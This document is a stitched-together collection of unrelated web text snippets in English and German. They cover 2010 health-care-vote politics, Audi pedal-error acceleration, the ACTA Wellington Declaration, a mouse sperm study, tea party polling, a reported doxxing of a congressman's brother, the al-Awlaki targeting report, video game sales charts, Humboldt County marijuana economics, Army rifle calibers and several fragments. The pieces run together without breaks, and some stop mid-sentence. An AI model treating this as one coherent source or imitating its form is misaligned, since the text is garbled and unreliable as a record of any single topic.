“ Chris Carney , Not a Pro-Life Democrat Anymore , ” read one NRCC press release Sunday , referring to the Pennsylvania congressman who signed on to the Stupak compromise .
And as they waged a last - ditch effort to derail the health care bill Sunday , Republicans sought to duplicate Stupak ’s efforts last fall — when he was considered a strong anti-abortion ally — to strengthen the provisions restricting abortion funding in the bill .
Stupak stood before the House and bluntly accused Republicans of playing politics with abortion .
“ For the Republicans now to claim that we send the bill back to committee under this guise of protecting life is disingenuous , ” said Stupak .
“ This motion is really to politicize life , not prioritize life .
We stand for the American people .
We stand up for life . ”
Several researchers hypothesized how a driver , intending to apply the brake pedal to keep the car from creeping , would occasionally press the accelerator instead .
Then , surprised that the car moved so much , he would try pressing harder .
Of course , if his right foot was actually on the accelerator , the throttle would open and the car would move faster .
This would then lead the driver to press the “ brake ” harder still , and to bring about even more acceleration .
Eventually , the car would be at full throttle , until it crashed .
The driver ’s foot would be all the way to the floor , giving him the impression that the brakes had failed .
In the cases that went to court , jurors naturally asked , why would a driver with decades of driving experience suddenly mistake the accelerator for the brake ?
And why would the episode last so long  often 6 to 10 seconds or more ?
Would n’t that be ample time to shut off the ignition , shift to neutral or engage the parking brake ?
First , in these situations , the driver does not really confuse the accelerator and the brake .
Rather , the limbs do not do exactly what the brain tells them to .
Noisy neuromuscular processes intervene to make the action slightly different from the one intended .
The driver intends to press the brake , but once in a while these neuromuscular processes cause the foot to deviate from the intended trajectory  just as a basketball player who makes 90 percent of his free throws sometimes misses the hoop .
This effect would be enhanced by the driver being slightly misaligned in the seat when he first gets in the car .
The answer to the second question is that , when a car accelerates unexpectedly , the driver often panics , and just presses the brake harder and harder .
Drivers typically do not shut off the ignition , shift to neutral or apply the parking brake .
In 1989 , the National Highway Traffic Safety Administration concluded that the incidents of unintended acceleration by the Audi 5000 were mostly caused by this kind of pedal error  not some electro - mechanical defect in the vehicle .
To fix the problem , Audi designed something called an automatic shift lock , which , when the car is being started , keeps the transmission in park unless and until the brake pedal is depressed .
If the driver should press the accelerator instead of the brake , the vehicle remains safely in park .
( In a car with a manual transmission , a driver is naturally prevented from making a simple pedal error , because even if his right foot goes to the accelerator instead of the brake , the car still will not move unless he also intentionally lifts his left foot from the clutch . )
Audi ultimately gave the world ’s other automakers the rights to the patent on the automatic shift lock and by the mid-1990s virtually all new cars had adopted the feature or some variant of it .
Incidents of sudden acceleration when people started their cars dropped sharply .
The shift lock not only made people safer but also provided evidence for the hypothesis that most of the problems had been caused by driver error .
Die Teilnehmer der Konferenz PublicACTA im neuseeländischen Wellington haben am Samstag eine Erklärung verabschiedet , in der sie für das Anti-Piraterie - Abkommen ACTA die Wahrung von Grundwerten des Zusammenlebens im Netz und demokratische Kontrolle fordern .
Auch fordern sie nationale Schrankenregelungen und internationale Vorschriften im Urheberrecht .
Die Wellington Declaration steht den Internetnutzern zum Mitunterzeichnen bereit und soll den Teilnehmern der nächsten ACTA - Verhandlungsrunde , die kommende Woche in Neuseeland beginnt , übergeben werden .
Die Erklärung wird auch vom deutschen Arbeitskreis Grundrechte , informationelle Selbstbestimmung und Datenschutz ( AK Daten ) unterstützt .
Im Schulterschluss mit dem EU - Parlament treten die Unterzeichner der Erklärung eine Beschränkung von ACTA auf Produktfälschung im großen , kommerziellen Stil ein , also den Problembereich , auf den das geplante Abkommen dem Titel nach eigentlich adressiert sei .
Auch sollen Regierungen klarstellen , welches Problem sie genau lösen wollen und warum nicht in der für Fragen des Geistigen Eigentums zuständigen World Intellectual Property Organisation ( WIPO ) offen verhandelt wird .
Auf der Konferenz sei auch erwogen worden , es bei einer entschiedenen Aufforderung zu belassen , bestehendes Recht nicht zu verändern , sagte Jordan Carter von der neuseeländischen Registry InternetNZ und einer der Sprecher von PublicACTA auf Anfrage von heise online .
Denn eigentlich soll sich ACTA ja allein mit Fragen der Durchsetzung befassen .
Allerdings habe man es für unwahrscheinlich gehalten , dass die beteiligten Regierungen jetzt noch eine Kehrtwende machen , berichtete Carter .
Daher würden in der Erklärung auch einige Bedingungen für ein umfassenderes Anti-Piraterie - Abkommen aufgelistet .
Vor allem verwahren sich die ACTA - Kritiker dagegen , dass Grundrechte wie Datenschutz und auch der Zugang zur Kommunikation ausgehöhlt würden .
Das Abschalten von Internetzugängen führe zur unverhältnismäßigen Einschränkung der Bürgerrechte .
Der Schutz von Internet Service Providern als reinen Mittlern dürfe wegen der Bedeutsamkeit des Zugangs zu den Netzen nicht von Bedingungen abhängig gemacht werden .
Die Unterzeichner der Erklärung wehren sich grundsätzlich dagegen , dass ACTA zum ersten Mal überhaupt einen weltweiten Standard für die Haftbarkeit von ISPs einführe .
Die australische Urheberrechtsexpertin Kim Weatherall hatte während der Konferenz darauf hingewiesen ( PDF ) , dass es einen solchen Standard bisher im internationalen Recht nirgends gebe .
( anw )
In promiscuous mouse species , sperm team up with their closest kin to give themselves an edge in the dash for the egg , a new study finds .
Once inside a female , sperm cells can discern and — via structures on their heads — literally hook up with their brethren amid the crush of sperm from other males .
( Related : " How a Man Produces 1,500 Sperm a Second . " )
The cells can then draft , Lance Armstrong - style , moving faster than they could alone thanks to more " engine " power from the cluster , said study co-author Heidi Fisher , an evolutionary geneticist at Harvard University 's Hoekstra Laboratory .
" It 's really amazing that this single cell can do this , " Fisher said .
" We used to think of sperm as packs of DNA with really fast tails .
But [ now we know ] they 're able to make these complex organizations . "
Surprisingly , the sperm cells ' recognition skills are " incredibly refined , " Fisher added :
In the experiments , sperm could pick out other sperm from the same male , even when the other sperm were from closely related mice .
Evolution Driving Sperm Teamwork
Fisher and colleague Hopi Hoekstra studied the oldfield mouse , which mates for life , and a related species , the highly promiscuous white - footed mouse .
Female white - footed mice will mate with multiple males several times within a minute .
The team extracted sperm from several individuals of each species and mixed two samples in four different combinations .
For instance , one experiment mixed sperm from two unrelated oldfield mice while another looked at sperm from two white - footed mouse " brothers . "
( The sperm carry both male and female chromosomes . )
In each case , sperm from one male was dyed to glow green under UV light , while the other 's sperm glowed red .
In both species , sperm formed groups , which swim significantly faster than single cells .
But in every experiment involving white - footed mice , the sperm clustered specifically with their brothers — though how the cells recognized each other is still unknown .
One theory is that related sperm express a certain protein on their heads that acts as an identifier , the authors write in their study .
Also worth noting , Fisher said , is that the teamwork lasted just two hours or less , until the sperm reached the egg :
The brotherly love ended when individuals became rivals for breaching the egg .
By contrast , the oldfield mouse sperm formed random groups without family ties , according to the study , published January 20 in the journal Nature .
The results support the long - held view that competition drives the evolution of sperm behavior , Fisher said .
( Read how sex can speed up evolution . )
Sperm Study Has Limitations
The Nature study is " really intriguing , and broadly supportive of ideas people have been kicking around , " said Rhonda Snook , who studies the evolution of sperm form and function at the U.K. 's University of Sheffield .
But she pointed out two limitations to the research .
For one , there 's not yet a method for observing sperm inside female mice , and it 's possible sperm behave differently in the reproductive tract than they do in a petri dish , Snook said .
Also , the study examines just one promiscuous and one monogamous species — it 's still unclear whether sperm cluster with relatives in other mammal species , 95 percent of which are promiscuous .
There 's no evidence , for example , that human sperm band together .
An angry organizer publishes what he thought was Tom Perriello 's home address .
Tea partiers told to ' drop by ' Perriello 's home
A tea party organizer angry over Rep. Thomas Perriello ’s ( D - Va. ) vote in favor of health care reform published what he thought was the freshman member ’s home address on a blog , in case any readers “ want to drop by ” and provide a “ personal touch ” to their views .
Rather than giving out Perriello ’s address however , the tea party activist mistakenly printed the home address of the congressman ’s brother .
Perriello ’s brother and wife have four children under the age of 8 .
Advertisement
In the post , the author gives out the address to his “ friends ” in Perriello ’s district .
“ Just in case any of his friends and neighbors want to drop by and say hi and express their thanks regarding his vote for health care , ” the author writes .
“ I personally believe it ’s so important for representatives to remain fully grounded and to remember exactly what it is their constituents are saying and how they are telling them to vote .
Nothing quite does that like a good face - to - face chat .
It has a much more personal touch to it . ”
The post does not have a byline but was published on a blog run by an organizer for the Lynchburg Tea Party , a member of the group confirmed to POLITICO .
There is no contact information on the blog , but POLITICO has been able to trace the blog to Mike Troxel , an organizer for the Lynchburg Tea Party who has been active in the organization since it launched last year .
In an interview with POLITICO , Troxel admitted to writing the post and said that he has no intention of removing the address from the blog .
Troxel found the address through a directory website and said he would only replace what he currently has on the blog with an address provided by Perriello ’s office .
“ If they would like to provide me with the address of Tom , then I ’d be more than happy to take it down , ” he said .
“ I have no reason to believe it ’s not his house . ”
“ We ’re pretty ticked off he voted for it , ” Troxel said .
Troxel , a 2005 graduate of Liberty University , added “ I was a journalism major in college , so I have every reason to believe my research is accurate . ”
Kurt Feigel , who frequently works and communicates with Troxel and runs a companion blog , told POLITICO that he has no issue with Troxel posting what he thought was a congressman ’s home address .
“ They have our home addresses .
I do n’t have a problem with it , ” Feigel — a fellow tea party organizer — said during a phone interview .
“ I do n’t think it ’s a good thing if it ’s not [ Perriello ’s ] address .
But I do n’t have a problem with posting his address . ”
Feigel justified Troxel ’s decision to post the home address by saying that Perriello ’s office does not “ respond to e-mail , they do n’t respond to letters , they do n’t respond to us showing up at his office .
So what am I going to do ? ”
“ We should be protesting on his front lawn .
He betrayed his district , ” Feigel added .
The post is time - stamped for Monday .
Perriello ’s office first learned of the post on Monday afternoon and immediately called the congressman ’s brother .
Nobody has stopped by the house yet , but the family had lamps stolen out of their yard this weekend as Perriello — a moderate who sided with the majority in passing the bill — weighed how to vote .
The congressman ’s office did not know if the events are related .
An aide for the congressman posted a comment to the blog asking that the address be removed .
The comment has been taken down with no correction to the post or any explanation .
Troxel said he never saw the comment .
Perriello ’s office declined to comment .
take a moment the next time you ’re at murder lake and pick up any of the knives washed up on its shores
feel its heft , its bright metal tooth glinting in the setting sun like a cheshire cat , the worn handle laying in your hand comfortable and smooth
now , reel back and sidearm it across the lake , sending it skittering on the water ’s calm surface until it disappears below .
do n’t mind the signs saying it ain’t allowed , son .
this is your moment , just as the sun sinks below the horizon , just as a knife sinks into a lake or body
and just remember what your old friend dr. murder told ya
UPDATE : Just noticed the following in the poll ( thanks to Greg Mitchell ) :
Do you think it is ever justified for citizens to take violent action against the government , or is it never justified ?
Justified 24
Never justified 71
DK /NA 5
The overall percentage of Americans who think it ’s ever justified is 16 % .
So the Teabagger number is 50 % higher than the public at large .
Via Greg Sargent :
* Lots to chew over in the new New York Times poll of the Tea Party supporters .
Our favorite : More Tea Party backers think Sarah Palin would not make an effective president , 47 % - 40 % .
* Ninety - two percent say Obama is moving the country towards socialism .
* But : A big majority , 62 % , favors those socialist government takeover schemes known as Social Security and Medicare .
* Sixty - three percent of Tea Partiers get their news from Fox , and a majority views the shows hosted by Glenn Beck and Sean Hannity as “ news shows . ” * First the Tea Partiers said Dems were hatching a secret scheme to provoke them to racism .
Now they ’re saying lefties plotted to infiltrate their rallies and make them look like whackjobs .
( Like they need any help in this department . )
My favorite :
Which political figure in the United States living TODAY do you admire most ?
Top 4
Other : 20 %
Newt Gingrich : 10 %
Sarah Palin : 9 %
George W. Bush / Mitt Romney / No one : 5 %
These folks are conservative Republicans , that ’s all they are .
The Office of University Housing oversees 12 first year buildings , 8 second year buildings , 9 upperclass buildings , and 18 Greek Life Houses .
Our Office also collaborates with the Triangle Towers and the Office of Real Estate to provide living opportunities in local apartment buildings .
These spaces have different room layouts , floor plans , and amenities depending on the location and class experience .
Whether you are an incoming freshman looking for your first room or a senior exploring your apartment options we hope these facilities pages are helpful in finding the right space for you .
New Mexico - born Muslim cleric
Anwar al - Awlaki has officially become the first American citizen confirmed to be on the CIA ’s assassination list , and officials for the Obama Administration insist he can be killed with impunity by the CIA or the military .
US citizen Anwar al - Awlaki
The move comes just two months after National Intelligence Director Dennis Blair informed the House of Representatives that the Obama Administration had reserved for itself the right to kill American citizens overseas as part of a “ defined policy . ”
“ He ’s in everybody ’s sights , ” noted one US official , while another alleged that he was an “ operational figure for al - Qaeda in the Arabian Peninsula ( AQAP ) . ”
One of the officials also added that “ US citizenship hardly gives you blanket protection overseas . ”
Despite the unending list of allegations against Awlaki , he has not been charged with any crime at all by the US government , let alone convicted of a capital crime .
The cleric has been openly critical of US foreign policy , and speculation of his “ link ” to Christmas underbomber Umar Farouk Abdulmutallab has fueled the calls to “ take him out . ”
But the US was already cooperating in attempted assassinations against Awlaki by the Yemeni government before Christmas , notably playing a role in a Christmas Eve air strike that officials initially said killed Awlaki and dozens of al - Qaeda members .
Last month , however , the government was forced to apologize for its claims and admitted that the vast majority of the people killed were women and children .
Putting Awlaki on the official assassination list , as he remains a US citizen , required the direct approval of President Obama .
It is unclear exactly when this authorization occurred , and notably if it was before the December assassination attempt .
Please turn on JavaScript .
Media requires JavaScript to play .
China has given the world a glimpse of its air force at a special performance by a display team .
Four Chinese - made J - 10 fighters put on a show of aerial stunts at a military base just outside the city of Tianjin .
China hopes the manoeuvrability and price of the J - 10 will make it attractive to buyers in other countries .
The BBC's Michael Bristow was at the show in Tianjin .
Description :
Ca n't make balloon animals ?
No problem .
Ditch the poodle and the puppy dog and let 's try something even more fun - and amazing !
Make a snake - and eat it !
Master the art of balloon swallowing like never before .
From the critically acclaimed author of The Amazing Alexander series comes DEEP .
Imagine taking a 5 foot long inflated balloon , handing it out for inspection , then swallowing 16 inches of it - and then letting your spectator pull it back out .
Then swallow the rest of the balloon and watch your spectators gasp !
With studio shots and live performances of 4 different routines , you will learn together with magic student Daniel as Justin teaches him - and you - every twist , turn , trick and technique of this incredible effect .
LHC Compact Muon Solenoid Experiment Webcams
There are currently two webcams online Camera 7 : looking at the Underground Experimental Cavern from the Saleve side .
looking at the Underground Experimental Cavern from the Saleve side .
Camera 8 : looking out of the window of the 1st Floor of the SCX building that houses the CMS Control room .
Gamasutra 's weekly column , " Saling The World " , covers the top five sellers for every available platform in the United States , Japan , and Europe , providing an important update of sales patterns worldwide .
This week 's charts , with data taken from April 8th , 2010 , have Big Game Hunter 2010 and Deadly Premonition leading U.S. sales , while Hokuto Musou and Sekaiju no Meikyuu III lead chart results in Japan .
Data for " Saling The World " comes courtesy of the public sales information on Amazon.com , Amazon.co.uk , and Amazon.co.jp , with sales split out for each platform and territory , and pre-orders disregarded .
This results in a true sense of what games are selling worldwide on the real - time updated service , as follows :
Nintendo Wii
North America : 1 . Cabela 's Big Game Hunter 2010 Gun Bundle ( Activision ) , 2 . Wii Fit Plus with Balance Board ( Nintendo ) , 3 . Just Dance ( Ubisoft ) , 4 . New Super Mario Bros. Wii ( Nintendo ) , 5 . Wii Sports Resort ( Nintendo ) .
Japan : 1 . New Super Mario Bros. Wii ( Nintendo ) , 2 . Wii Fit Plus with Balance Board ( Nintendo ) , 3 . Wii Sports Resort ( Nintendo ) , 4 . Mario Kart Wii ( Nintendo ) , 5 . Wii Fit Plus ( Nintendo ) .
UK : 1 . Just Dance ( Ubisoft ) , 2 . Wii Fit Plus with Balance Board ( Nintendo ) , 3 . Wii Fit Plus ( Nintendo ) , 4 . Mario & Sonic at the Olympic Winter Games ( Sega ) , 5 . New Super Mario Bros. Wii ( Nintendo ) .
An Amazon " Deal of the Day " price drop puts a gun peripheral - bundled version of Cabela 's Big Game Hunter 2010 at the top of this week 's Nintendo Wii sales chart in North America .
Just Dance continues to lead UK sales , meanwhile , as New Super Mario Bros .
Wii keeps the top spot in Japan .
Xbox 360
North America : 1 . Deadly Premonition ( Ignition ) , 2 . Battlefield : Bad Company 2 ( EA Games ) , 3 . Call of Duty : Modern Warfare 2 ( Activision ) , 4 . Mass Effect 2 ( EA Games ) , 5 . Left 4 Dead 2 ( EA Games ) .
Japan : 1 . Deathsmiles ( Cave ) , 2 . Call of Duty : Modern Warfare 2 ( Square Enix ) , 3 . Chaos ; Head Noah ( 5 pb ) , 4 . Steins ; Gate ( 5 pb ) , 5 . Chaos ; Head Love Chu Chu ! ( 5 pb ) .
UK : 1 . Call of Duty : Modern Warfare 2 ( Activision ) , 2 . Battlefield : Bad Company 2 ( EA Games ) , 3 . Forza Motorsport 3 ( Microsoft ) , 4 . Just Cause 2 -- Limited Edition ( Square Enix ) , 5 . FIFA 10 ( EA Sports ) .
Ignition Entertainment 's Deadly Premonition is this week 's biggest - selling Xbox 360 game in North America , following a day - long price drop at Amazon .
A budget - priced reissue of Cave 's arcade - ported shooter Deathsmiles tops the charts in Japan , as Modern Warfare 2 and Battlefield : Bad Company once again head sales in the UK .
PlayStation 3
North America : 1 . God of War III ( SCEA ) , 2 . LittleBigPlanet : Game of the Year Edition ( SCEA ) , 3 . Assassin's Creed II ( Ubisoft ) , 4 . Final Fantasy XIII ( Square Enix ) , 5 . God of War Collection ( SCEA ) .
Japan : 1 . Hokuto Musou ( Koei ) , 2 . Pro Yakyuu Spirits 2010 ( Konami ) , 3 . Ryu ga Gotoku 4 : Densetsu o Tsugumono ( Sega ) , 4 . God of War III ( SCEA ) , 5 . Demon 's Souls ( SCEI ) .
UK : 1 . God of War III ( SCEE ) , 2 . FIFA 10 ( EA Sports ) , 3 . Heavy Rain ( SCEE ) , 4 . Call of Duty : Modern Warfare 2 ( Activision ) , 5 . Assassin's Creed II ( Ubisoft ) .
God of War III leads PlayStation 3 software sales in the United States for the third week running .
A recently issued " Greatest Hits " version of LittleBigPlanet takes second place .
Koei's Fist of the North Star - licensed brawler Hokuto Musou retakes the top chart spot in Japan , while God of War III moves up to take first place in Europe .
PC
North America : 1 . World of Warcraft : Wrath of the Lich King ( Blizzard ) , 2 . Battlefield : Bad Company 2 ( EA Games ) , 3 . Left 4 Dead 2 ( EA Games ) , 4 . The Sims 3 ( EA Games ) , 5 . Mass Effect 2 ( EA Games ) .
Japan : 1 . Battlefield : Bad Company 2 ( EA Games ) , 2 . Monster Hunter Frontier Online Season 7.0 Premium Package ( Capcom ) , 3 . The Sims 3 : High End Loft Pack ( EA Games ) , 4 . Europa Universalis III ( Cyber Front ) , 5 . SimCity 4 Deluxe ( EA Games ) .
UK : 1 . Battlefield : Bad Company 2 ( EA Games ) , 2 . The Sims 3 ( EA Games ) , 3 . Football Manager 2010 ( Sega ) , 4 . Dragon Age : Origins ( EA Games ) , 5 . Mass Effect 2 ( EA Games ) .
World of Warcraft : Wrath of the Lich King heads PC software sales in North America following a sale on all Blizzard products at Amazon last week .
Battlefield : Bad Company 2 trails close behind at second place in domestic sales numbers , and leads as this week 's biggest - selling title in Japan and the UK .
Nintendo DS
North America : 1 . Pokemon HeartGold Version ( Nintendo ) , 2 . Pokemon SoulSilver Version ( Nintendo ) , 3 . Mario Kart DS ( Nintendo ) , 4 . New Super Mario Bros. ( Nintendo ) , 5 . Zhu Zhu Pets ( Activision ) .
Japan : 1 . Sekaiju no Meikyuu III : Seikai no Raihousha ( Atlus ) , 2 . Tomodachi Collection ( Nintendo ) , 3 . Love Plus ( Konami ) , 4 . Pokemon Ranger : Hikari no Kiseki ( Nintendo ) , 5 . New Super Mario Bros. ( Nintendo ) .
UK : 1 . Pokemon SoulSilver Version ( Nintendo ) , 2 . Professor Layton and Pandora's Box ( Nintendo ) , 3 . New Super Mario Bros. ( Nintendo ) , 4 . Pokemon HeartGold Version ( Nintendo ) , 5 . Peppa Pig : The Game ( Ubisoft ) .
Pokemon SoulSilver and HeartGold remain consistently strong sellers in the United States , while SoulSilver emerges as the more popular of the pair in the UK .
Atlus 's Etrian Odyssey sequel Sekaiju no Meikyuu III : Seikai no Raihousha leads the charts in Japan for the second week in a row , as Konami's Love Plus moves up to third place as anticipation builds for an upcoming sequel .
PlayStation Portable
North America : 1 . God of War : Chains of Olympus ( SCEA ) , 2 . Resistance : Retribution ( SCEA ) , 3 . Shin Megami Tensei : Persona ( Atlus ) , 4 . Grand Theft Auto : Liberty City Stories ( Rockstar ) , 5 . Dissidia Final Fantasy ( Square Enix ) .
Japan : 1 . Hakuouki Portable ( Idea Factory ) , 2 . Pro Yakyuu Spirits 2010 ( Konami ) , 3 . Monster Hunter Portable 2nd G ( Capcom ) , 4 . Judie no Atelier : Guramnat no Renkinjutsu - Toraware no Morito Limited Edition ( Gust ) , 5 . Saki Portable ( Alchemist ) .
UK : 1 . FIFA 10 ( EA Sports ) , 2 . LittleBigPlanet ( SCEE ) , 3 . Dissidia Final Fantasy ( Square Enix ) , 4 . Gran Turismo ( SCEE ) , 5 . Need for Speed Shift ( EA Games ) .
Tecmo's Dead or Alive Paradise drops out of the U.S. top five after a promising debut last week , as lower - priced titles like God of War : Chains of Olympus and Resistance : Retribution rise up to take its place .
Idea Factory 's visual novel Hakuouki Portable steals the lead from Pro Yakyuu Spirits 2010 in Japan , while FIFA 10 remains as popular as ever in Europe .
In this region renowned for potent marijuana buds , many in Humboldt County long accepted that legalizing the weed was the right thing to do .
Now some folks are n’t so sure .
A statewide initiative in November would allow cities to regulate pot possession and cultivation .
Assemblyman Tom Ammiano ( D - San Francisco ) has proposed a broader legalization .
Neither is certain to pass .
Yet as medical marijuana has spread and city and state budgets are being slashed , legalized marijuana is becoming more possible than ever .
That has some people here thinking twice .
Wholesale prices have dropped in the last five years -- from $ 4,000 a pound to below $ 3,000 for the best cannabis -- as medical - marijuana dispensaries have attracted a slew of new growers statewide , Humboldt growers say .
Recently , “ Keep Pot Illegal ” bumper stickers have been seen on cars around the county .
In chat rooms and on blogs , anonymous writers predict that tobacco companies will crush small farmers and take marijuana production to the Central Valley .
With legalization , if residents do n’t act , “ we ’re going to be ruined , ” said Anna Hamilton , a radio host on KMUD - FM ( 91.1 ) in southern Humboldt County .
In March , Hamilton organized a community meeting in Garberville addressing the question “ What ’s After Pot ? ”
It attracted more than 150 people , including a county supervisor , economic development consultants and business owners .
All this was unimaginable to the hippies and student radicals who came here in the 1960s and ‘ 70s , escaping a conventional world they abhorred .
As marijuana ’s price steadily rose , it funded their escape .
In time , mom-and - pop growers became experts .
The plant thrived in the tolerant climate -- cultural and geographic -- of far Northern California .
Small plots got bigger .
An Emerald Triangle of premium marijuana growers formed in Humboldt , Trinity and Mendocino counties until , virtually alone , they supported the economies .
Following Hamilton ’s lead , a meeting will be held in Ukiah , Mendocino ’s county seat , on April 24 to discuss “ The Future of Cannabis in Northern California . ”
Speakers include the director of the Ukiah Chamber of Commerce .
For years the plant was only a small part of the Humboldt economy , as logging and fishing provided most of the jobs .
Today , harvestable redwoods are mostly gone ; so , too , the sawmills .
Salmon beds are covered with silt .
Marijuana stands as a major source of income , even for many whose grandparents worked the sawmills and 40 years ago railed at the pot -smoking hippies moving into their midst .
Humboldt State economists guess that marijuana accounts for between $ 500 million and $ 700 million of the county ’s $ 3.6 billion economy .
Though growing is widespread , particularly in southern Humboldt County , it remains illegal for those not connected to a medical marijuana collective .
Every year growers are arrested and sent to prison .
Some live in paranoid isolation , telling their children not to discuss their parents ’ work .
Meanwhile , they ’ve gotten used to selling a weed for thousands of dollars a pound .
Legalization could take many forms .
But the conventional wisdom here is that fully legal weed might fetch no more than a few hundred dollars a pound , as more people grow it and police no longer pull up millions of plants a year .
Illegal marijuana “ is the government ’s best agricultural price - support program ever , ” said Gerald Myers , a retired engineer and former volunteer fire chief who moved to the county in 1970 .
“ If they ever want to help the wheat farmers , make wheat illegal . ”
On the other hand , increased demand for legal pot might buoy its price .
“ If it ’s regulated like cigarettes , you ’re going to have a massive increase in demand for it , I would believe , ” said Erick Eschker , economics professor at Humboldt State .
Either way , though , talk of legalization raises a question :
Is Humboldt ’s competitive advantage in growing pot , or in growing pot illegally ?
Plantations divert water from streams and rivers .
Some growers use huge diesel generators to power greenhouses on mountainsides -- growing indoors in the outdoors .
Occasional spills from these generators have devastated streams .
Indoor growers , meanwhile , devour electricity .
Officials estimate that 800 to 2,000 houses in Arcata are devoted partly or entirely to growing marijuana .
Humboldt County is also known for its lax prosecution compared with other counties .
“ That advantage , if you will , is going to be gone if it ’s legal , ” Eschker said .
Any well - designed legalization ought to ensure that “ other people in the community wo n’t have to pick up the tab for an industry cutting corners , ” said county Supervisor Mark Lovelace .
“ People would have to learn to turn this into a legit above - board business . ”
How many could do that is unclear .
At stake , many locals say , is more than a business ; it ’s a way of life .
The cannabis economy has spawned numerous nonprofits and community health and arts groups , which depend on growers for sustenance .
“ It ’s morally right that marijuana be legal , ” said Kym Kemp , a journalist who blogs about life in southern Humboldt County .
“ But I know why they want to say , ‘ No , do n’t let this happen to us , ’ because we ’re going to die .
It already happened with the logging industry . ”
But others say legalization would create a more solid , independent economy in the long run for the county , which has a population of 129,000 .
Instead of depending on one crop , “ the community would learn all over again about economic self - sufficiency ” that the original hippies moved here to achieve , Myers said .
More houses and agricultural land might again find legal uses , the theory goes , thus making property more affordable .
The county might actually be invigorated , said Clif Clendenen , a Humboldt County supervisor and owner of an apple cider business in Fortuna .
“ It saps some community energy when you have your best and brightest out in the hills growing and not contributing in the same way they would if they went off to college and came back to teach , ” he said .
“ Whenever you have 20 - year - olds making six - figure incomes , it ’s an economic house of cards . ”
Once legal , marijuana cultivation might well lose its outlaw glamour , to be replaced by the daily grind and smaller profits that farmers all face .
Growers would have to keep books , pay taxes and abide by pesticide regulations .
Grocery stores , car dealers , construction - supply outlets and other retailers would have to adjust .
So , too , would thousands of residents , many with full - time jobs , who make ends meet by trimming marijuana at harvest season for $ 25 an hour .
With so few voters , Humboldt is unlikely to influence what happens statewide .
“ We ’re better off trying to figure out what the pathway would be to a robust industry cluster with [ marijuana ] as its product , ” said Kathy Moxon of the Humboldt Area Foundation , a community nonprofit .
Radio host Hamilton has suggested new school curricula , urging that a community college satellite campus planned for Garberville offer more classes in accounting and business administration .
Others have proposed classes in marijuana testing .
Moxon sees an opportunity to take business away from Oakland - based Oaksterdam University , which offers classes in marijuana growing , the science of cannabis , new methods of ingestion , even the weed ’s history .
“ We ’re the place where people should come to learn to grow , ” Moxon said .
“ Who wants to go to Oakland to learn to grow ? ”
Then there is the Napa Valley model , where vintners thrive by focusing on premium wines , branding and wine tourism .
Appellation -- the branding of the Humboldt name like Champagne or Bordeaux -- is a route people here find promising .
But achieving a Napa Valley of marijuana might require the kind of collective action that Humboldt weed growers have found anathema .
Remarkably , Hamilton ’s “ What ’s After Pot ? ” meeting was the first time the topic was discussed so openly and thus stunned many locals .
And no one seems to have investigated how a Humboldt appellation might be acquired .
Still , the idea resonates .
Said Hamilton : “ It ’s appellation or Appalachia . ”
sam.quinones@latimes.com
So that paper we linked to and wrote about yesterday , Increasing Small Arms Lethality in Afghanistan : Taking Back the Infantry Half - Kilometer , is generating some major heat , particularly down at Special Operations Command ( SOCOM ) , we learned today .
The paper , written by a student at the School of Advanced Military Studies ( SAMS ) at Leavenworth , that ’s the one for the Army ’s best and brightest officers , says the infantry ’s standard small arm ( the M - 4 rifle ) cannot engage the enemy in Afghanistan where most firefights occur past 300 meters .
This is due to an ineffective round , the 5.56 mm , and inadequate training .
The paper was written last fall , but has really been making the rounds just in the past few weeks .
I brought the paper up this morning during a roundtable discussion at the Pentagon with the folks from Program Executive Office – Soldier .
Col .
Doug Tamilio , program manager for Soldier weapons lethality ( this guys weapons knowledge is unreal ) , said it was a very good paper , although he thought some of the conclusions were a bit out of context .
Tamilio has made it mandatory reading for his shop , particularly after spending a few days down at SOCOM and hearing the splash the paper has made there .
“ He ’s right , the fight in Afghanistan is longer …
But you ’ve got to go back to where soldiers are today .
Can a soldier engage beyond 300 meters accurately ?
The answer is probably not . ”
Most soldiers coming out of basic training can’t shoot expertly , except for the few sharpshooters .
“ It takes a while to become an expert at shooting at ranges beyond 300 meters , ” he said .
But PEO
Soldier is focused on equipping , not so much training .
So what is PEO Soldier giving the infantry to take back that half kilometer ?
To begin with the 7.62 mm M - 14 Enhanced Battle Rifle ( EBR ) , a modern version of the venerable M14 rifle , Tamilio said .
Long a favorite of Navy SEALS and other special ops units , the Army is now distributing two EBR 14s per rifle squad to get more range and lethality .
Soldier feedback so far has been very positive , he said .
A team is in Afghanistan right now collecting feedback from soldiers and putting together a report to brief to Congress .
The other weapon that ’s gained favor with foot soldiers in Afghanistan is the Mk. 48 Squad Automatic Weapon ( SAW ) , a 7.62 mm version of the SAW that is used by SOCOM but the Army is now buying .
Soldiers are leaving behind the 5.56 mm SAW and taking the 7.62 mm version with them instead , he said .
“ The fight in Afghanistan has probably shown us that 7.62 mm , in certain aspects , is needed and required , ” he said .
Soldier preference for the EBR 14 and the Mk. 48 SAW backs that up .
But moving the entire rifle squad to the heavier round is a bigger question for the Army infantry school at Fort Benning to wrestle with , Tamilio said .
Until now , the policy has been that in a 9 - man squad the Army would keep the 5.56 mm round across the squad .
“ We ’re starting to think of a mix within our squads . ”
The question then becomes do you need a 7.62 mm in every type of fight ?
Is it the right round for close quarters urban firefights ?
These are the questions the Army is grappling with , Tamilio said .
He was n’t ready to say the Army should move to the bigger round across the board .
PEO Soldier is trying to provide a “ modular ” capability to the rifle squad , where they can mix and match weapons for different missions , said Brig .
Gen. Peter Fuller .
That ’s a concept borrowed from special operations , where they have a big closet full of weapons , tailored to specific missions , that they can choose from .
The paper ’s author referred to this preferred approach as the “ arms room concept . ”
The focus right now is on the three Afghanistan surge brigades , he said .
“ We ’ve gone to them and said here is some additional capability we have in our closet that has n’t been fielded … we ca n’t field it to the whole Army .
But I can give you an increased capability so you have a little more kit in your kit bag to adapt to that environment . ”
So before Vee left for her trip she pulled out some spending money to take and she left a $ 20 bill in my wallet with a little post - it note that said “ I love you ” .
Later that day I went to the coffee shop to grab some grub with my friends .
I handed the cute redhead barista my $ 20 and she stopped mid sentence , gave me a weird look , pulled the love note from the bill and handed it back to me .
I thought it was so funny that rather than explain where it came from I just acted as though she gave it to me and said , “ aaaww , how sweet ” .
Girl Gone Wild ist ein Popsong der amerikanischen Sängerin Madonna .
Der Song ist die zweite Singleauskopplung des zwölften Studioalbums von Madonna , ... Album :
When it came time to decide who should direct The Avengers , guess who totally slew the competition ?
Joss Whedon is about to ink a deal that will have him helming the multi- superhero action flick , based on the classic comic books , for Marvel Studios , Variety reported Tuesday .
